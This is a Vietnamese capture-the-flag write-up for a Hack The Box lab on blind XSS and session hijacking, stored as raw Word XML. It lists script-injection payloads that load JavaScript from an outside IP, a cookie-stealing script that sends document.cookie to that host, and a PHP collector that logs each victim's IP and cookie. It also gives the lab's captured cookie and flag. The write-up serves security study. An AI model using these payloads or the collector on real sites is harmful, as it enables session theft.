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FF55E" w14:textId="5A4A6EE9" w:rsidR="00CB0613" w:rsidRDefault="00D42A25" w:rsidP="00D42A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42A25">
        <w:t>Try to repeat what you learned in this section to identify the vulnerable input field and find a working XSS payload, and then use the 'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to get the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0499AA" w14:textId="0996967E" w:rsidR="00822812" w:rsidRDefault="00822812" w:rsidP="00822812">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7118283A" wp14:editId="5F8664D6">
            <wp:extent cx="2743200" cy="3196477"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="151924839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48399" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2749511" cy="3203831"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B65124A" w14:textId="2CECC85C" w:rsidR="00822812" w:rsidRPr="00FE3A39" w:rsidRDefault="00822812" w:rsidP="00FE3A39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE3A39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kiểm tra trường đầu vào bị lỗ hổng XSS Blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A41437" w14:textId="5AB62C00" w:rsidR="0048499C" w:rsidRDefault="0048499C" w:rsidP="00822812">
      <w:r w:rsidRPr="0048499C">
        <w:t>Mẹo: Chúng ta sẽ nhận thấy rằng email phải khớp với định dạng email, ngay cả khi chúng ta thử thao tác các tham số yêu cầu HTTP, vì nó có vẻ được xác thực ở cả giao diện người dùng và giao diện quản trị. Do đó, trường email không dễ bị tấn công và chúng ta có thể bỏ qua việc kiểm tra trường này. Tương tự như vậy, chúng ta có thể bỏ qua trường mật khẩu, vì mật khẩu thường được băm và thường không hiển thị dưới dạng văn bản thuần túy. Điều này giúp chúng ta giảm số lượng trường đầu vào dễ bị tấn công mà chúng ta cần kiểm tra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37294FC8" w14:textId="69C1ABF5" w:rsidR="0048499C" w:rsidRDefault="0048499C" w:rsidP="00822812">
      <w:r>
        <w:t xml:space="preserve">Giờ cần kiểm tra các trường Fullname ,username,Profile </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2A0DEC" w14:textId="0CF82F64" w:rsidR="00822812" w:rsidRDefault="00374F6D" w:rsidP="00822812">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="283ECAE6" wp14:editId="0816DDD8">
            <wp:extent cx="5943600" cy="1335405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="296056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56795" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1335405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3625C47E" w14:textId="6CB9C9D0" w:rsidR="004E4DB3" w:rsidRDefault="004E4DB3" w:rsidP="00822812">
      <w:r>
        <w:t>Ta sử dụng các payload này để xác định từng trường ( theo như trong bài giảng )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493CA4D" w14:textId="77777777" w:rsidR="004E4DB3" w:rsidRDefault="004E4DB3" w:rsidP="004E4DB3">
      <w:r>
        <w:t>&lt;script src=http://10.10.15.37/script.js&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AD7DCF" w14:textId="6CCC1E7E" w:rsidR="004E4DB3" w:rsidRDefault="004E4DB3" w:rsidP="004E4DB3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C4994F" w14:textId="0EE49825" w:rsidR="004E4DB3" w:rsidRDefault="004E4DB3" w:rsidP="004E4DB3">
      <w:r>
        <w:t>'&gt;&lt;script src=http://10.10.15.37/script1.js&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053A1B0F" w14:textId="77777777" w:rsidR="004E4DB3" w:rsidRDefault="004E4DB3" w:rsidP="004E4DB3">
      <w:r>
        <w:t>"&gt;&lt;script src=http://10.10.15.37/script2.js&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212CBA22" w14:textId="77777777" w:rsidR="004E4DB3" w:rsidRDefault="004E4DB3" w:rsidP="004E4DB3">
      <w:r>
        <w:t>javascript:eval('var a=document.createElement(\'script\');a.src=\'http://10.10.15.37/script3.js\';document.body.appendChild(a)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BED8038" w14:textId="77777777" w:rsidR="004E4DB3" w:rsidRDefault="004E4DB3" w:rsidP="004E4DB3">
      <w:r>
        <w:t>&lt;script&gt;function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "http://10.10.15.37/script4.js");a.send();&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D8EC98" w14:textId="715CC453" w:rsidR="004E4DB3" w:rsidRDefault="004E4DB3" w:rsidP="004E4DB3">
      <w:r>
        <w:t>&lt;script&gt;$.getScript("http://10.10.15.37/script4.js")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32292D0C" w14:textId="0F711A11" w:rsidR="004E4DB3" w:rsidRDefault="004E4DB3" w:rsidP="004E4DB3">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368B0633" w14:textId="3B38354B" w:rsidR="00582669" w:rsidRDefault="00582669" w:rsidP="00822812">
      <w:r>
        <w:t xml:space="preserve">Khi kiểm tra lần lượt 3 trường bằng burp intruder ta phát hiện ở trường  Profile có yêu cầu gửi về </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F4805E" w14:textId="11B2881F" w:rsidR="00752FDB" w:rsidRDefault="00752FDB" w:rsidP="00822812">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="091CCFCD" wp14:editId="20855797">
            <wp:extent cx="5943600" cy="2165350"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="3380631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63157" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2165350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C3598" w14:textId="78101374" w:rsidR="00752FDB" w:rsidRDefault="00752FDB" w:rsidP="00822812">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BC75303" wp14:editId="215EB9BC">
            <wp:extent cx="5943600" cy="988695"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="21278617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61747" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="988695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69AD51" w14:textId="15ED27CF" w:rsidR="00582669" w:rsidRDefault="00752FDB" w:rsidP="00822812">
      <w:r>
        <w:t xml:space="preserve">Cụ thể payload là </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607EF12D" w14:textId="2FD2757C" w:rsidR="00752FDB" w:rsidRDefault="00752FDB" w:rsidP="00822812">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58502057" w14:textId="1CF6B11E" w:rsidR="00752FDB" w:rsidRDefault="00752FDB" w:rsidP="00822812">
      <w:r w:rsidRPr="00752FDB">
        <w:t>"&gt;&lt;script src=http://10.10.15.37/script2.js&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF14EAB" w14:textId="59B11CA4" w:rsidR="00381158" w:rsidRDefault="00752FDB" w:rsidP="00822812">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3753224C" w14:textId="54076DF3" w:rsidR="00FE3A39" w:rsidRDefault="00FE3A39" w:rsidP="00FE3A39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E225A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chiếm đoạt phiên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E72A63" w14:textId="63EAA44E" w:rsidR="00527BF1" w:rsidRDefault="006E225A" w:rsidP="00822812">
      <w:r w:rsidRPr="006E225A">
        <w:t xml:space="preserve"> yêu cầu </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cần </w:t>
      </w:r>
      <w:r w:rsidRPr="006E225A">
        <w:t>một tải trọng JavaScript để gửi cho chúng tôi dữ liệu cần thiết và một tập lệnh PHP được lưu trữ trên máy chủ của chúng tôi để lấy và phân tích dữ liệu được truyền đi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE6BAD" w14:textId="248390D9" w:rsidR="006E225A" w:rsidRDefault="006E225A" w:rsidP="00822812">
      <w:r>
        <w:t>File script2.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB14D86" w14:textId="41DD7267" w:rsidR="006E225A" w:rsidRDefault="006E225A" w:rsidP="00822812">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A735E" w14:textId="7E46EC3B" w:rsidR="006E225A" w:rsidRDefault="006E225A" w:rsidP="006E225A">
      <w:r w:rsidRPr="006E225A">
        <w:t>new Image().src='http://</w:t>
      </w:r>
      <w:r>
        <w:t>10.10.15.37</w:t>
      </w:r>
      <w:r w:rsidRPr="006E225A">
        <w:t xml:space="preserve"> /index.php?c='+document.cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7008E7" w14:textId="601AC2F3" w:rsidR="00D02641" w:rsidRDefault="00D02641" w:rsidP="006E225A">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798AB33E" w14:textId="1004A2FC" w:rsidR="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="006E225A">
      <w:r>
        <w:t>File index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D72A06" w14:textId="7239E148" w:rsidR="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="006E225A">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EC2C16" w14:textId="77777777" w:rsidR="00F4508D" w:rsidRPr="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="00F4508D">
      <w:r w:rsidRPr="00F4508D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7764322A" w14:textId="77777777" w:rsidR="00F4508D" w:rsidRPr="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="00F4508D">
      <w:r w:rsidRPr="00F4508D">
        <w:t>if (isset($_GET['c'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E55DDB" w14:textId="77777777" w:rsidR="00F4508D" w:rsidRPr="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="00F4508D">
      <w:r w:rsidRPr="00F4508D">
        <w:t xml:space="preserve">    $list = explode(";", $_GET['c']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4E8A47" w14:textId="77777777" w:rsidR="00F4508D" w:rsidRPr="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="00F4508D">
      <w:r w:rsidRPr="00F4508D">
        <w:t xml:space="preserve">    foreach ($list as $key =&gt; $value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131B98F7" w14:textId="77777777" w:rsidR="00F4508D" w:rsidRPr="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="00F4508D">
      <w:r w:rsidRPr="00F4508D">
        <w:t xml:space="preserve">        $cookie = urldecode($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C80709" w14:textId="77777777" w:rsidR="00F4508D" w:rsidRPr="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="00F4508D">
      <w:r w:rsidRPr="00F4508D">
        <w:t xml:space="preserve">        $file = fopen("cookies.txt", "a+");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C2ACCD" w14:textId="77777777" w:rsidR="00F4508D" w:rsidRPr="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="00F4508D">
      <w:r w:rsidRPr="00F4508D">
        <w:t xml:space="preserve">        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C07B8" w14:textId="77777777" w:rsidR="00F4508D" w:rsidRPr="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="00F4508D">
      <w:r w:rsidRPr="00F4508D">
        <w:t xml:space="preserve">        fclose($file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E70F01D" w14:textId="77777777" w:rsidR="00F4508D" w:rsidRPr="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="00F4508D">
      <w:r w:rsidRPr="00F4508D">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB8734F" w14:textId="77777777" w:rsidR="00F4508D" w:rsidRPr="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="00F4508D">
      <w:r w:rsidRPr="00F4508D">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382C7165" w14:textId="77777777" w:rsidR="00F4508D" w:rsidRPr="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="00F4508D">
      <w:r w:rsidRPr="00F4508D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDFC63E" w14:textId="7A087380" w:rsidR="00F4508D" w:rsidRDefault="00F4508D" w:rsidP="006E225A">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3057E650" w14:textId="5A45975F" w:rsidR="006A43BB" w:rsidRDefault="006A43BB" w:rsidP="006E225A"/>
    <w:p w14:paraId="43807DC1" w14:textId="1AE949C2" w:rsidR="00381158" w:rsidRDefault="00381158" w:rsidP="006E225A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02BF6256" wp14:editId="3ACD04FC">
            <wp:extent cx="5943600" cy="3218180"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="21399144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14417" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3218180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A73AAB" w14:textId="0CFF561C" w:rsidR="00381158" w:rsidRDefault="00381158" w:rsidP="006E225A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A972C0A" wp14:editId="6AC993BD">
            <wp:extent cx="5943600" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4398119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11936" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A494E" w14:textId="629B08EF" w:rsidR="00583A79" w:rsidRDefault="00583A79" w:rsidP="006E225A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70B2B008" wp14:editId="6D7860DB">
            <wp:extent cx="5943600" cy="1245235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55577228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72281" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1245235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22397DF7" w14:textId="12A23796" w:rsidR="00C5276C" w:rsidRDefault="00C5276C" w:rsidP="006E225A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="743B3A93" wp14:editId="59A0E84D">
            <wp:extent cx="5943600" cy="738505"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1167038699"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89159" name="Picture 1" descr="A close up of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="738505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1958C0D9" w14:textId="0DC304FC" w:rsidR="00283ACD" w:rsidRDefault="00283ACD" w:rsidP="006E225A">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9211AE" w14:textId="4BC73F5B" w:rsidR="00283ACD" w:rsidRDefault="00283ACD" w:rsidP="006E225A">
      <w:r w:rsidRPr="00283ACD">
        <w:t>cookie=c00k1355h0u1d8353cu23d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0CE202" w14:textId="605099B2" w:rsidR="00283ACD" w:rsidRDefault="00283ACD" w:rsidP="006E225A">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B522D1" w14:textId="2419F7D7" w:rsidR="009C1FCF" w:rsidRDefault="009C1FCF" w:rsidP="006E225A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1345B86B" wp14:editId="17E81385">
            <wp:extent cx="5943600" cy="2135505"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1635826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26056" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2135505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E23E235" w14:textId="4CF9B4C3" w:rsidR="00E43390" w:rsidRDefault="00E43390" w:rsidP="006E225A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22988B83" wp14:editId="3051EA7C">
            <wp:extent cx="5943600" cy="2615565"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19807232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23243" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2615565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F631AD8" w14:textId="511AC8D3" w:rsidR="001F167D" w:rsidRDefault="001F167D" w:rsidP="006E225A">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F167D">
        <w:t>HTB{4lw4y5_53cur3_y0ur_c00k135}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6902727A" w14:textId="64683E0B" w:rsidR="00266CB5" w:rsidRDefault="00266CB5" w:rsidP="006E225A"/>
    <w:p w14:paraId="507935F8" w14:textId="6830A01C" w:rsidR="002762A4" w:rsidRPr="006E225A" w:rsidRDefault="002762A4" w:rsidP="006E225A"/>
    <w:p w14:paraId="69EB14C2" w14:textId="77777777" w:rsidR="006E225A" w:rsidRDefault="006E225A" w:rsidP="00822812"/>
    <w:p w14:paraId="1E2989B4" w14:textId="79E2A653" w:rsidR="0048499C" w:rsidRDefault="0048499C" w:rsidP="00822812"/>
    <w:sectPr w:rsidR="00484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01E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B841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45DEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4168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5240472">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1488201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613"/>
    <w:rsid w:val="00077ABC"/>
    <w:rsid w:val="0013536A"/>
    <w:rsid w:val="001F167D"/>
    <w:rsid w:val="00266CB5"/>
    <w:rsid w:val="002762A4"/>
    <w:rsid w:val="00283ACD"/>
    <w:rsid w:val="00346DCB"/>
    <w:rsid w:val="00374F6D"/>
    <w:rsid w:val="00381158"/>
    <w:rsid w:val="00390493"/>
    <w:rsid w:val="0048499C"/>
    <w:rsid w:val="004E4DB3"/>
    <w:rsid w:val="00527BF1"/>
    <w:rsid w:val="00582669"/>
    <w:rsid w:val="00583A79"/>
    <w:rsid w:val="006A43BB"/>
    <w:rsid w:val="006E225A"/>
    <w:rsid w:val="00703ABE"/>
    <w:rsid w:val="00752FDB"/>
    <w:rsid w:val="00822812"/>
    <w:rsid w:val="009C1FCF"/>
    <w:rsid w:val="00B279AA"/>
    <w:rsid w:val="00C5276C"/>
    <w:rsid w:val="00CB0613"/>
    <w:rsid w:val="00D02641"/>
    <w:rsid w:val="00D42A25"/>
    <w:rsid w:val="00E43390"/>
    <w:rsid w:val="00F4508D"/>
    <w:rsid w:val="00FE3A39"/>
    <w:rsid w:val="00FE54A7"/>
    <w:rsid w:val="00FE5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49D1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1DFF945F-4516-4E98-8FEF-767CF8D77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6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06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06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06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06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06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06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06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06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6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06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06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06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06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06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06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06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0613"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00CB06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6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6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6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0613"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00CB0613"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CB0613"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00CB0613"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
